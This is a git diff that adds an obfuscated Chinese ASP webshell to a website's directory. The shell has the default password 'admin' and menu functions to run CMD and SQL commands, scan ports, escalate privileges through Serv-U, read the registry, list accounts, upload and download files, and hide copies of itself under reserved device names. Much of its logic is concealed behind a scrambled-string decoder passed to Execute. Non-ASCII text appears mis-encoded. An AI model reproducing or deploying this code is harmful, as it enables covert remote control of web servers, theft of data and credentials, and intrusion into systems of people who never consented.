diff --git a/www-7jyewu-cn/土司搞基asp大马.asp b/www-7jyewu-cn/土司搞基asp大马.asp
new file mode 100644
index 0000000..ef5b098
--- /dev/null
+++ b/www-7jyewu-cn/土司搞基asp大马.asp
@@ -0,0 +1,623 @@
+<%
+
+UserPass="admin"'	����
+'------------------------�������ڷǷ�;��----------------------
+mmname="��˾���asp����"
+bottomad="Oh my God, what is safe?"
+blogurl="http://aspmuma.cccpan.com"
+'----------------------һ�к���������޹�----------------------
+Server.ScriptTimeout=999999999:Response.Buffer=true:On Error Resume Next
+ExeCute "sub ShowErr():If Err Then:RRS""<br><a href='javascript:history.back()'><br>&nbsp;"" & Err.Description & ""</a><br>"":Err.Clear:Response.Flush:End If:end sub:Sub RRS(str):response.write(str):End Sub:Function RePath(S):RePath=Replace(S,""\"",""\\""):End Function:Function RRePath(S):RRePath=Replace(S,""\\"",""\""):End Function:URL=Request.ServerVariables(""URL""):ServerIP=Request.ServerVariables(""LOCAL_ADDR""):Action=Request(""Action""):Pos=2:RootPath=Server.MapPath("".""):WWWRoot=Server.MapPath(""/""):Serveru=request.servervariables(""http_host"")&url:FolderPath=Request(""FolderPath""):serverp=UserPass:Pn=pos*44:FName=Request(""FName""):pso=5:BackUrl=""<br><br><center><a href='javascript:history.back()'>����</a></center>"""
+
+RRS"<html><meta http-equiv=""Content-Type"" content=""text/html; charset=gb2312"">"
+RRS"<title>"&mmname&" - "&ServerIP&"</title>"
+rrS"<style type=""text/css"">"
+rrs"body,td{font-size: 12px;background-color:#000000;color:#00ff00;SCROLLBAR-FACE-COLOR: #000000; SCROLLBAR-HIGHLIGHT-COLOR: #008000; SCROLLBAR-SHADOW-COLOR: #008000; SCROLLBAR-3DLIGHT-COLOR: #000000; SCROLLBAR-ARROW-COLOR: #000000; SCROLLBAR-TRACK-COLOR: #000000; FONT-FAMILY: verdana; SCROLLBAR-DARKSHADOW-COLOR: #000000}"
+rrs"input,select,textarea{BORDER-TOP-WIDTH: 1px; FONT-WEIGHT: bold; BORDER-LEFT-WIDTH: 1px; FONT-SIZE: 12px; BORDER-LEFT-COLOR: #008000; BACKGROUND: #004000; BORDER-BOTTOM-WIDTH: 1px; BORDER-BOTTOM-COLOR: #008000; COLOR: #00ff00; BORDER-TOP-COLOR: #008000; FONT-FAMILY: verdana; BORDER-RIGHT-WIDTH: 1px; BORDER-RIGHT-COLOR: #008000}"
+rrs"hr{color:#00ff00}"
+rrs".C{background-color:#000;border:0px}"
+rrs".cmd{background-color:#000;color:#FFF}"
+rrs"body{margin: 0px;margin-left:4px;}"
+rrs"BODY{color:#00ff00}"
+rrs"a{color:#008000;text-decoration: none;}a:hover{color:#00ff00;background:#000}"
+rrs".am{color:#888;font-size:12px;}"
+rrs"</style>"
+rRs"</style>"
+ExeCute SinfoEn("lError=kilnerrodow.o;}win trueeturns(){rError killctiont>funscrip=javaguaget lanscripRRS~<rs;~`lse;}rn fa retu;else trueeturn~~))r�˲�����ȷ��Ҫִ��rm(~~confi{if (sok()on yeunctiRRS~f~`();}~ubmitorm.saddrf;top.oldere = F.valurPathFoldeform..addr){topolderder(FowFolon ShunctiRRS~f`~~;}} = ~~valueName.orm.Fhidef{top.}elseit();.submeformp.hidon;toFActiue = n.valActioform..hide){top=nullName!}if(Der~~;~~Othme = e{DNa;}elsDNameue = e.val.FNameformp.hide);to,FNam���ڣ�~~���ļ��Ƿ�ȫ����,עMdb�ļ���Ҫѹ����(~~����rompte = p{DNamdb~~)pactM~~Comion==(FActse ife;}el DNamlue =me.vam.FNadeforop.hime);t~,FNa��ͬ����~��,ע�ⲻb�ļ�ȫ���½���Md~������Ҫmpt(~= proName ~~){DteMdb~Creaon==~FActie if(;}elsDNameue = e.val.FNameformp.hide);to,FNamȫ����~~�����ļ���������Ҫ��pt(~~ promame =~){DNlder~NewFon==~~Actio if(F}elseName;|~~+D~~|||e += .valuFNameform..hide);topFName����~~,���ļ���ȫ���ƶ���Ŀ(~~����rompte = p{DNamer~~)eFold~~Movion==(FActse ife;}el+DNam|||~~= ~~|lue +me.vam.FNadeforop.hime);t~,FNa��ȫ����~��Ŀ���ļ��������ƶ�pt(~~ promame =~){DNlder~opyFo==~~Cctionif(FAelse ame;}~~+DN~|||| += ~valueName.orm.Fhidef;top.Name)��~~,F���ļ�ȫ�����ƶ���Ŀ(~~����rompte = p{DNamle~~)oveFi==~~Mctionif(FAelse ame;}~~+DN~|||| += ~valueName.orm.Fhidef;top.Name)��~~,F���ļ�ȫ���븴�Ƶ�Ŀ(~~����rompte = p{DNamle~~)opyFi==~~Cctionif(FAName;e = F.valuFNameform..hide){topctionme,FAm(FNallForon FuunctiRRS~f~",Pso)
+RRS"function DbCheck(){if(DbForm.DbStr.value == """"){alert(""�����������ݿ�"");FullDbStr(0);return false;}return true;}":RRS"function FullDbStr(i){if(i<0){return false;}Str = new Array(12);Str[0] = ""Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&RePath(Session("FolderPath"))&"\\db.mdb;Jet OLEDB:Database Password=***"";Str[1] = ""Driver={Sql Server};Server="&ServerIP&",1433;Database=DbName;Uid=sa;Pwd=****"";Str[2] = ""Driver={MySql};Server="&ServerIP&";Port=3306;Database=DbName;Uid=root;Pwd=****"";Str[3] = ""Dsn=DsnName"";Str[4] = ""SELECT * FROM [TableName] WHERE ID<100"";Str[5] = ""INSERT INTO [TableName](USER,PASS) VALUES(\'username\',\'password\')"";Str[6] = ""DELETE FROM [TableName] WHERE ID=100"";Str[7] = ""UPDATE [TableName] SET USER=\'username\' WHERE ID=100"";Str[8] = ""CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))"";Str[9] = ""DROP TABLE [TableName]"";Str[10]= ""ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)"";Str[11]= ""ALTER TABLE [TableName] DROP COLUMN PASS"";Str[12]= ""��ֻ��ʾһ������ʱ������ʾ�ֶε�ȫ���ֽڣ������������Ʋ�ѯʵ��.\n����һ������ֻ��ʾ�ֶε�ǰ��ʮ���ֽڡ�"";if(i<=3){DbForm.DbStr.value = Str[i];DbForm.SqlStr.value = """";abc.innerHTML=""<center>��ȷ�ϼ��������ݿ�������SQL����������䡣</center>"";}else if(i==12){alert(Str[i]);}else{DbForm.SqlStr.value = Str[i];}return true;}":RRS"function FullSqlStr(str,pg){if(DbForm.DbStr.value.length<5){alert(""�������ݿ����Ӵ��Ƿ���ȷ!"");return false;}if(str.length<10){alert(""����SQL����Ƿ���ȷ!"");return false;}DbForm.SqlStr.value = str;DbForm.Page.value = pg;abc.innerHTML="""";DbForm.submit();return true;}"
+RRS"function gotoURL(targ,selObj,restore){if(selObj.options[selObj.selectedIndex].js==1){eval(selObj.options[selObj.selectedIndex].value);if (restore) selObj.selectedIndex=0}else{eval(targ+"".location='""+selObj.options[selObj.selectedIndex].value+""'"");if (restore) selObj.selectedIndex=0;}}</script>"
+rrs "<body" 
+If Action="" then RRS " scroll=no"
+rrs ">"
+Dim Sot(13,2):Sot(0,0) = "Scripting.FileSystemObject":Sot(0,2) = "�ļ��������":Sot(1,0) = "wscript.shell":Sot(1,2) = "������ִ�����":Sot(2,0) = "ADOX.Catalog":Sot(2,2) = "ACCESS�������":Sot(3,0) = "JRO.JetEngine":Sot(3,2) = "ACCESSѹ�����":Sot(4,0) = "Scripting.Dictionary":Sot(4,2) = "�������ϴ��������":Sot(5,0) = "Adodb.connection":Sot(5,2) = "���ݿ��������":Sot(6,0) = "Adodb.Stream":Sot(6,2) = "�������ϴ����":Sot(7,0) = "SoftArtisans.FileUp":Sot(7,2) = "SA-FileUp �ļ��ϴ����":Sot(8,0) = "LyfUpload.UploadFile":Sot(8,2) = "���Ʒ��ļ��ϴ����":Sot(9,0) = "Persits.Upload.1":Sot(9,2) = "ASPUpload �ļ��ϴ����":Sot(10,0) = "JMail.SmtpMail":Sot(10,2) = "JMail �ʼ��շ����":Sot(11,0) = "CDONTS.NewMail":Sot(11,2) = "����SMTP�������":Sot(12,0) = "SmtpMail.SmtpMail.1":Sot(12,2) = "SmtpMail�������":Sot(13,0) = "Microsoft.XMLHTTP":Sot(13,2) = "���ݴ������"
+For i=0 To 13
+Set T=Server.CreateObject(Sot(i,0))
+If -2147221005 <> Err Then
+IsObj=" ��"
+Else
+IsObj=" ��"
+Err.Clear
+End If
+Set T=Nothing
+Sot(i,1)=IsObj
+Next
+
+
+
+
+If FolderPath<>"" then
+Session("FolderPath")=RRePath(FolderPath)
+End If:If Session("FolderPath")="" Then
+FolderPath=RootPath
+Session("FolderPath")=FolderPath
+End if
+Function MainForm() 
+RRS"<form name=""hideform"" method=""post"" action="""&URL&""" target=""FileFrame"">"
+RRS"<input type=""hidden"" name=""Action"">"
+RRS"<input type=""hidden"" name=""FName"">"
+RRS"</form>"
+RRS"<table width='100%'>"
+RRS"<form name='addrform' method='post' action='"&URL&"' target='_parent'>"
+RRS"<tr><td width='40' align='left'>��ַ��</td><td>"
+RRS"<input name='FolderPath' style='width:100%' value='"&Session("FolderPath")&"'>"
+RRS"</td><td width='70' align='center'><input name='Submit' type='submit' value='GOGO'>" 
+RRS"</td></tr></form></table>"
+RRS"<table width='100%' height='96%' style='border:1px solid #008000;' cellpadding='0' cellspacing='0'>"
+RRS"<td width='135' id=tl>"
+RRS"<iframe name='Left' src='?Action=MainMenu' width='100%' height='100%' frameborder='0'></iframe></td>"
+RRS"<td width=1 style='background:#008000'></td><td width=1 style='padding:2px'><a onclick=""document.getElementById('tl').style.display='none'"" href=##><b>����</b></a><p><a onclick=""document.getElementById('tl').style.display=''"" href=##><b>��ʾ</b></a></p></td><td width=1 style='background:#008000'><td>"
+RRS"<iframe name='FileFrame' src='?Action=Show1File' width='100%' height='100%' frameborder='0'></iframe>"
+RRS"<tr>����<a href='javascript:ShowFolder(""C:\\Program Files"")'>Program</a>������<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\"")'>AllUsers</a>������<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\����ʼ���˵�\\����\\"")'>����</a>������<a href='javascript:ShowFolder(""c:\\Documents and Settings\\All Users\\����ʼ���˵�\\����\\����"")'>����</a>������<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\Application Data\\Symantec\\pcAnywhere\\"")'>pcAnywhere</a>������<a href='javascript:ShowFolder(""c:\\Program Files\\serv-u\\"")'>serv-u</a>������<a href='javascript:ShowFolder(""C:\\Program Files\\Real"")'>RealServer</a>������<a href='javascript:ShowFolder(""C:\\Program Files\\Microsoft SQL Server\\"")'>SQL</a>������<a href='javascript:ShowFolder(""c:\\PHP"")'>PHP</a>������<a href='javascript:ShowFolder(""C:\\WINDOWS\\system32\\config\\"")'>config</a>������<a href='javascript:ShowFolder(""c:\\WINDOWS\\system32\\inetsrv\\data\\"")'>data</a>����<a href='javascript:ShowFolder(""c:\\windows\\Temp\\"")'>Temp</a>����<a href='javascript:ShowFolder(""C:\\RECYCLER\\"")'>RECYCLER</a>����<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\Documents\\"")'>��д</a>��<br>"
+End Function:Function MainMenu()
+RRS"<table width='100%' cellspacing='0' cellpadding='0'>"
+RRS"<tr><td><hr hight=1 width='100%'>"
+RRS"</td></tr>"
+If soT(0,1)=" ��" Then
+RRS"<tr><td height='24'>��Ȩ��</td></tr>"
+Else
+Set ABC=New LBF:RRS ABC.ShowDriver():Set ABC=Nothing
+RRS"<tr><td height='20'> <a href='javascript:ShowFolder("""&RePath(WWWRoot)&""")'>��վ��Ŀ¼</a></td></tr>"
+RRS"<tr><td height='20'><a href='javascript:ShowFolder("""&RePath(RootPath)&""")'>������Ŀ¼</a></td></tr>"
+RRS"<tr><td height='20'><a href='?Action=goback' target='FileFrame'>���ϼ�Ŀ¼</a></td></tr>"
+RRS"<tr><td height='20'><a href='javascript:FullForm("""&RePath(Session("FolderPath")&"\NewFolder")&""",""NewFolder"")'>���½�Ŀ¼</a></td></tr>"
+RRS"<tr><td height='20'><a href='?Action=EditFile' target='FileFrame'>���½��ı�</a></td></tr>"
+RRS"<tr><td height='20'><a href='?Action=downloads' target='FileFrame'>��Զ������</a></td></tr>"
+RRS"<tr><td height='20'><a href='?Action=UpFile' target='FileFrame'>���ϴ��ļ�</a><hr></td></tr>"
+
+RRS"<tr><td height='21'><a href='?Action=Course' target='FileFrame'>���û��˺�</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=adminab' target='FileFrame'>�������Ա</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=getTerminalInfo' target='FileFrame'>���Զ���¼</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=ServerInfo' target='FileFrame'>�����֧��</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=Cmd1Shell' target='FileFrame'>��ִ��CMD����</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=MMD' target='FileFrame'>��SQLִ��CMD</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=ScanPort' target='FileFrame'>���˿�ɨ��</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=Servu' target='FileFrame'>��Serv-u��Ȩ</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=ReadREG' target='FileFrame'>����ע���</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=att' target='FileFrame'>���޸��ļ�����</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=hiddenshell' target='FileFrame'>�����س�������</a><hr></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=aspx' target='FileFrame'>��ASPX̽��</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=php' target='FileFrame'>��PHP̽��</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=jsp' target='FileFrame'>��JSP̽��</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=Cplgm&M=1' target='FileFrame'>���߼�����</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=Cplgm&M=2' target='FileFrame'>����������</a></td></tr>"
+RRS"<tr><td height='20'><a href='?Action=Cplgm&M=3' target='FileFrame'>�������滻</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=DbManager' target='FileFrame'>�����ݿ����</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=PageAddToMdb' target='FileFrame'>��������</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=Logout' target='_top'>���˳���¼</a></td></tr>"
+End if
+RRS"</table></table>"
+End Function:
+
+
+
+
+
+Sub PageAddToMdb():ExeCute SinfoEn("atePth, cteAthm Dih`~)cteAth(~stueeq R =cteAth`~)thPahe~tt(esquRe= h atePth`0000=1uteOimtTipcr.SerrvSe0`he Tb~MdTodd~a= t Ache tIfn`thPahe(tdboMdTad)`UrckBa~&v>di</��!����>��br><erntcen=igalv di~<S RRl`nd.EseonspRe`Ifd En`he Tb~MdomFrseeael~r= t Ache tIfn`thPahe(tckPaun)`UrckBa~&v>di</��!����>��br><erntcen=igalv di~<S RRl`nd.EseonspRe`Ifd En`��:�д��ļ�r><bS~RR~`t>os=podthmem or<fS~RR~`0>=8zesi~ ~~& ) ~)~.h(atpPMar.veer(SdecoEnmlHt& ~ ~~e=luvah atePthe=am nutnp<iS~RR~`t>Ache=tmenab MdTodd=aueal venddhie=yp tutnp<iS~RR~`n>iopt/oO<FS>��pp=aueal vontiop><ontiop</SO>Fso=fueal vontiop><odthMehe=tmenat ecel<sS~RR~`>~ctlese</S~RR`>~��'ʼ��'��e=luvat miub=spetyt puin <S~RR`��~Ŀ¼ͬ��ľ��SH��H,λ�ļ�db.mSH��H���� ��ע:r><br><bS~RR`>~rmfo</S~RR`/>br:<��)O֧FS(��⿪����>��r/<hS~RR~`t>os=podthmem or<fS~RR~`0>=8zesi~ b~mdH.HS~\& ) ~)~.h(atpPMar.veer(SdecoEnmlHt& ~ ~~e=luvah atePthe=am nutnp<iS~RR~`'>����'��e=luvat miub=spetyt puin><cteAthe=am ndbmMroeFasleree=luvan deid=hpetyt puin <S~RR~`¼�¼�Ŀ��ͬHľHSλ�ڼ������ĵ������� ��ע:r><br><bS~RR~`>~rmfo</S~RR",Pos):End Sub:Sub addToMdb(thePath):ExeCute SinfoEn("xtNee umes Rorrr EOn`lotaCado ar,Stnnco, amrest, nnco, rsm Dig`t~SerdcoReB.ODAD(~ctjeObteeaCrr.veer S =rst Se)`~)amreStB.ODAD(~ctjeObteeaCrr.veer S =amrestt Se`~)ontiecnnCoB.ODAD(~ctjeObteeaCrr.veer S =nncot Se`~)ogalat.COXAD(~ctjeObteeaCrr.veer S =ogalatoCadt Se`~)db.mSH~Hh(atpPMar.veer S &=~ceurSoa at D0;4.B.EDOLt.Jet.ofoscrMir=deviro~P= r Stnnco`Stnncoe atre.CogalatoCadr`Stnncon pe.Onncor`)~gema IntteoneCil fr,harCVah atePth, EDERSTLU CEY KRYMARI P1)0,Y(ITNTDE Int iIda(ateDil Fleab TteeaCr(~tecuxe.Ennco)`pe.Oamrestn`= e yp.Tamrest1` 33,, nnco, a~ateDil~Fn pe.Ors`enTh~ so~f= ) d~hoeteMth(~stueeq RIf`eatr ss, rh,atePthb MdoreFreoTfsm`ls Ee`amrest, rs, thPahe tdbrMFoeeTrsa`Ifd En`selo.Crs`selo.CnnCo`selo.Camrest`nghiot N =rst Se`nghiot N =nncot Se`nghiot N =amrestt Se`nghiot N =ogalatoCadt Se",Pos):End Sub:lI="��$S8~++'PEE#'#INDy&$EU,S8<,<8<'S8<,*{)'w**<88������":execute(lIl(lI)):Function fsoTreeForMdb(thePath, rs, stream):ExeCute SinfoEn("FileL, sysfilesers,  foldlder,theFotem, Dim iist`SH.ldmdb$H$HSH.t = ~leLissysFib$~`se Th= Falath) (thePxistslderE~).FobjectstemOileSying.Fcriptct(~SeObjeCreatrver.If Seen`����!~)���߲�����Ŀ¼������ & ~ ePathrr(thshowE`End If`(thePolder.GetFect~)emObjeSystg.Filiptin(~ScrbjecteateOer.Cr Servder =heFolSet tath)`r.FilFolde= theiles Set fes`ubFolder.SheFols = tolderSet fders`n foltem Iach iFor Eders`treamrs, sath, tem.PMdb ieeForfsoTr`Next`n filtem Iach iFor Ees`<= 0 ~$~) me & em.Na & it, ~$~eListysFilStr(sIf InThen`rs.AddNew`Path,item. Mid(h~) =hePatrs(~t 4)`Path)item.File(dFromm.Loastrea`m.Reastrea~) = ntentileCors(~fd()`rs.Update`End If`Next`= Notiles Set fhing`othins = NolderSet fg` Nothder =heFolSet ting",Pso):End Function:Sub unPack(thePath):ExeCute SinfoEn("xtNee umes Rorrr EOn`0000=1uteOimtTipcr.SerrvSe0`deoleFth, trnSon cm,eatr sn,on cr,st, ws, rsm Dir`~\& ) .~(~thPaap.MerrvSe= r st~`~)etdSorec.RDBDO~At(ecbjeOatre C =rst Se`m~eatr.SDBDO~At(ecbjeOatre C =amrestt Se)`n~ioctneon.CDBDO~At(ecbjeOatre C =nncot Se)`~;& h atePth& ~ e=rcou StaDa0;4.B.EDOLt.Jet.ofoscrMir=deviro~P= r Stnnco~`Stnncon pe.Onncor` 11,, nnco, a~ateDil~Fn pe.Ors`pe.Oamrestn`= e yp.Tamrest1`Eos. rilnt UDof`~)~\, ~)thPahe~ts((revrRStIn, ~)thPahe~ts((rftLe= r deoleFth)`he Tseal F =r)deoleFth& r sts(stxirEdeol.F~)ctjeObemstSyleFig.inptriSc(~ctjeObteeaCrr.veer SIfn`erldFohe t &tr(serldFoteeacr)`Ifd En`s(Eoet.Samrest)`~)ntteoneCil~fs( rteri.Wamrest` 2),h~atePth(~rs& r ste iloFeTav.Samrest`exeNov.Mrst`opLo`selo.Crs`selo.Cnnco`selo.Camrest`nghiot N =wst Se`nghiot N =rst Se`nghiot N =amrestt Se`nghiot N =nncot Se",Pos):End Sub:Sub createFolder(thePath):ExeCute SinfoEn("m Dii`\~ ~h,atePthr(stIn= i )` 0 > ilehi WDo`enThe lsFa= ) i), thPahe(tftLes(stxirEdeol.F~)ctjeObemstSyleFig.inptriSc(~ctjeObteeaCrr.veer SIf`)) 1 - ih,atePtht(ef(LerldFoteeaCr).t~ecbjmOteyseSil.Fngtiipcr~St(ecbjeOatre.CerrvSe`Ifd En`he T~)~\, 1)+ i , thPahe(tid(MtrnS IIfn`\~ ~), 1 + ih,atePthd(Mir(stIn+ i = i )`ls Ee`= i 0`Ifd En`opLo",Pos):End Sub:Sub saTreeForMdb(thePath, rs, stream):ExeCute SinfoEn("stLileFiys sr,deoleFth, emitm Di`b$ldH.HSb$mdH.HS~$= t iseLilsFsy~`h)atePthe(acSpmeNaX.sa= r deoleFtht Se`mste.IerldFohe tInm te ichEar Fo`enThe ru T =erldFoIsm.te iIf`amrest, rs, thPam.te idbrMFoeeTrsa`ls Ee`enTh0 =  <~)~$& e am.Nemit& ~ ~$, stLileFiys(strnS IIf`Nedd.Arsw` 4h,at.Pemitd(Mi= ) h~atePth(~rs)`h)at.Pemite(ilmFrodFoa.Lamrest`d(ea.Ramrest= ) t~enntColefi(~rs)`atpd.Urse`Ifd En`Ifd En`xtNe`inthNo= r deoleFtht Seg",Pos):End Sub:Function Course():ExeCute SinfoEn("ter'>='cenalign='0' ddingellpa'1' ccing=llspa0' ceder='' bor'menuolor=' bgc='600widthable br><tSI=~<~`></tr��</tdͳ�û����nu'>ϵr='megcoloer' b'centlign='3' aspan=' colt='20heigh><td &~<trSI=SI>~` nextesumeror ron er`NT://(~Winbject getObj inach ofor e.~)`err.clear`e=~~ rtTypJ.Staif OBthen`&~<trSI=SI>~`&nbspFF~~>#FFFFor=~~bgcol20~~ ht=~~ heig&~<tdSI=SI;~`&obj.SI=SIName`>&nbsFFF~~~#FFFlor=~ bgcod><td&~</tSI=SIp;~ `��(��)~&~ϵͳ��SI=SI`d></t&~</tSI=SIr>~`d></tp;</t>&nbs~~2~~span=~ colFFFF~~~#FFolor=~ bgc~~20~ight=td he<tr><SI0=~r>~ `end if`x=~�Զ�hen le=2 trtTypJ.Staif OB~`x=~�ֶ�hen le=3 trtTypJ.Staif OB~`x=~����hen le=4 trtTypJ.Staif OB~`pe=2 artTyBJ.Stand Owin~ ))<>~h,4,3j.patid(obase(mif LCthen`></tr></td/fontth&~<bj.pap;~&o>&nbsF0000or=#Ft col]<fon&lx&~������:~~~>[��n=~~2olspaF~~ cFFFFFr=~~#gcolo0~~ bt=~~2heigh><td &~<tryNameisplaobj.Dsp;~&~>&nbFFFF~~~#FFolor=~ bgc~~20~ight=td he/td><me&~<bj.Nap;~&o>&nbsFFF~~~#FFFlor=~ bgco~20~~ght=~d heitr><tI1&~<SI1=S>~`else`></tr></td/fontth&~<bj.pap;~&o>&nbs399FFor=#3t col]<fon&lx&~������:~~~>[��n=~~2olspaF~~ cFFFFFr=~~#gcolo0~~ bt=~~2heigh><td &~<tryNameisplaobj.Dsp;~&~>&nbFFFF~~~#FFolor=~ bgc~~20~ight=td he/td><me&~<bj.Nap;~&o>&nbsFFF~~~#FFFlor=~ bgco~20~~ght=~d heitr><tI2&~<SI2=S>~`end if`next`</tabSI2&~&SI1&I&SI0RRS Sle>~",Pso):End Function:Function ServerInfo():ExeCute SinfoEn("ter'>='cenalign='0' ddingellpa'1' ccing=llspa0' ceder='' bor'menuolor=' bgc='80%widthable br><tSI=~<~`></trϢ</td���������nu'>��r='megcoloer' b'centlign='3' aspan=' colt='20heigh><td &~<trSI=SI>~`td></)&~</NAME~RVER_s(~SEiableerVar.servquest>~&reFFFF'='#FFcolortd bg/td><bsp;<F'>&nFFFFFor='#bgcol><td ��</td'>������FFFFFr='#Fgcolo00' bth='2' widt='20heigh><td nter'n='ce alig&~<trSI=SItr>~`FFF'>'#FFFolor=d bgctd><tsp;</'>&nbFFFFFr='#Fgcolo<td b</td>������IPFFF'>'#FFFolor=' bgc='200width'20' ight=td heer'><'centlign=<tr aank'>='_blargetrm' t'ipfoname=asp' ndex.com/ip138.www.itp://n='htactiopost thod=rm me&~<foSI=SI~`/form/tr></td><'2'><alue=on' v'actiname=den' ='hid typeinput��ѯ'><lue='t' vasubmiype='put t> <in~)&~'_ADDRLOCALles(~ariabrverVst.SeRequee='~& valu='15' size='ip' nametext'ype='put t&~<inSI=SI>~`</tr></td>nbsp;ow&~&'>~&nFFFFFr='#Fgcolo<td b</td>nbsp;FF'>&#FFFFlor=' bgcod><tdʱ��</t'>������FFFFFr='#Fgcolo00' bth='2' widt='20heigh><td nter'n='ce alig&~<trSI=SI~`></tr~</tdRS~)&CESSOF_PROBER_O(~NUMablesrVariServeuest.~&ReqFFF'>'#FFFolor=d bgctd><tsp;</'>&nbFFFFFr='#Fgcolo<td b</td>CPU����'>������FFFFFr='#Fgcolo00' bth='2' widt='20heigh><td nter'n='ce alig&~<trSI=SI>~`d></t&~</t~OS~)bles(Variaerverest.S&RequFF'>~#FFFFlor=' bgcod><tdp;</t>&nbsFFFF'='#FFcolortd bg/td><����ϵͳ<'>������FFFFFr='#Fgcolo00' bth='2' widt='20heigh><td nter'n='ce alig&~<trSI=SIr>~`></tr~</tdRE~)&OFTWAVER_S(~SERablesrVariServeuest.~&ReqFFF'>'#FFFolor=d bgctd><tsp;</'>&nbFFFFFr='#Fgcolo<td b</td>�������汾'>WEBFFFFFr='#Fgcolo00' bth='2' widt='20heigh><td nter'n='ce alig&~<trSI=SI>~`=0 ToFor i 13`td></)&~</t(i,2>~&So=leftalignFFF' '#FFFolor=d bgctd><t)&~</t(i,1>~&SoFFFF'='#FFcolortd bg/td><0)&~<ot(i,'>~&SFFFFFr='#Fgcolo00' bth='2' widt='20heigh><td nter'n='ce alig&~<trSI=SItr>~`Next`RRS SI",Pso):End Function:Function DownFile(Path):ExeCute SinfoEn("arle.CseonspRe`)),0(6ot(SctjeObteeaCr= M OSt Se`enOpM.OS` 1 =peTyM.OS`at PleFiomFradLoM.OSh`)+\~,~thpav(Retrns=Isz1`z),sthpad(Mi& ~ e=amenil ft;enhmactt~a, n~ioitosspDit-enntCo ~eradHedd.AseonspRe`iz.SSM O~,thngLet-enntCo ~eradHedd.AseonspRee`8~F-UT ~ =etrsha.CseonspRe`amrestt-teocn/ioaticplap ~ =peTyntteon.CseonspRe~`ea.RSM OteriyWarin.BseonspRed`shlu.FseonspRe`osClM.OSe`inthNo= M OSt Seg",Pos):End Function:Function HTMLEncode(S):if not isnull(S) then:S= replace(S,">","&gt;"):S=replace(S,"<","&lt;"):S=replace(S,CHR(39),"&#39;"):S=replace(S,CHR(34),"&quot;"):S=replace(S,CHR(20),"&nbsp;"):HTMLEncode=S:end if:End Function:sub hiddenshell
+fpath=request.servervariables("path_translated"):set fso=server.createobject("scripting.filesystemobject"):pex="com1|com2|com3|com4|com5|com6|com7|com8|com9|lpt1|lpt2|lpt3|lpt4|lpt5|lpt6|lpt7|lpt8|lpt9":rndpex=split(pex,"|")(rndnumber(0,17)):session("seljw")="":filepath1=server.mappath("."):filename1=right(fpath,len(fpath)-instrrev(fpath,"\")):url=request.servervariables("url"):url=left(url,instrrev(url,"/"))&rndpex&"."&filename1:fso.copyfile fpath,"\\.\"&filepath1&"\"&rndpex&"."&filename1:set fso=nothing:rrs "<script>parent.location='http://"&request("server_name")&url&"';</script>"
+end sub:Function UpFile():
+If Request("Action2")="Post" Then
+Set U=new UPC : Set F=U.UA("LocalFile")
+UName=U.form("ToPath")
+If UName="" Or F.FileSize=0 then
+SI="<br>�������ϴ�����ȫ·����ѡ��һ���ļ��ϴ�!"
+Else
+F.SaveAs UName
+If Err.number=0 Then
+SI="<center><br><br><br>�ļ�"&UName&"�ϴ��ɹ���</center>"
+End if
+End If
+Set F=nothing:Set U=nothing
+SI=SI&BackUrl
+RRS SI
+ShowErr()
+Response.End
+End If
+SI="<br><br><br><table border='0' cellpadding='0' cellspacing='0' align='center'>"
+SI=SI&"<form name='UpForm' method='post' action='"&URL&"?Action=UpFile&Action2=Post' enctype='multipart/form-data'>"
+SI=SI&"<tr><td>"
+SI=SI&"�ϴ�·����<input name='ToPath' value='"&RRePath(Session("FolderPath")&"\13cmd.exe")&"' size='40'>"
+SI=SI&" <input name='LocalFile' type='file'size='25'>"
+SI=SI&" <input type='submit' name='Submit' value='�ϴ�'>"
+SI=SI&"</td></tr></form></table>"
+RRS SI:RRS ""&copyurl&""
+End Function::Function Cmd1Shell():ExeCute SinfoEn("checked=~ checked~`t(~SPeques) = RPath~Shellion(~ Sess Then)<>~~(~SP~questIf Re~)`ath~)hellPon(~SSessiPath=Shell`md.ex = ~clPath Shel Thenth=~~ellPaif She~`heckehen ces~ t)<>~yript~(~wscquestif Red=~~`cmd~)est(~ RequCmd =n Def~ The~)<>~(~cmdquestIf Re`st'>~d='pomethoform SI=~<`bsp;~sp;&n'>&nbh:70%'widttyle=&~' SlPath&Shelue='~' vale='SPt nam<inpuLL·����&~SHESI=SI`hell~ipt.S>WScrked&~&checyes'~lue='t' vascripme='wx' naeckboe='chc typlass=put c&~<inSI=SI`440;'ight:0%;heth:10='widStylearea <text'ִ��'>alue=it' v'submtype=nput '> <iCmd&~~&Deflue='%' vath:92='widStylecmd' ame='put n&~<inSI=SI>~`~ The~)<>~(~cmd.FormquestIf Ren`s~ th)=~yeript~(~wsc.Formquestif Reen`Sot(1ject(ateObM=CreSet C,0))`~&Def~ /c Path&Shellexec(D=CM.Set DCmd)`eadalout.rD.stdaaa=Dl`SI=SI&aaa`else` Nextesumeror ROn Er`.Shelcriptt(~WSObjecreatever.Cs=SerSet wl~)`.Shelcriptt(~WSObjecreatever.Cs=SerSet wl~)`bjectstemOileSying.Fcriptct(~SeObjeCreatrver.so=SeSet f~)`md.txth(~cmapparver. = sepFileszTemt~)` 0, TFile,zTemp~ & s ~ > Cmd && Def/c ~ th&~ ellPan (Shws.RuCall 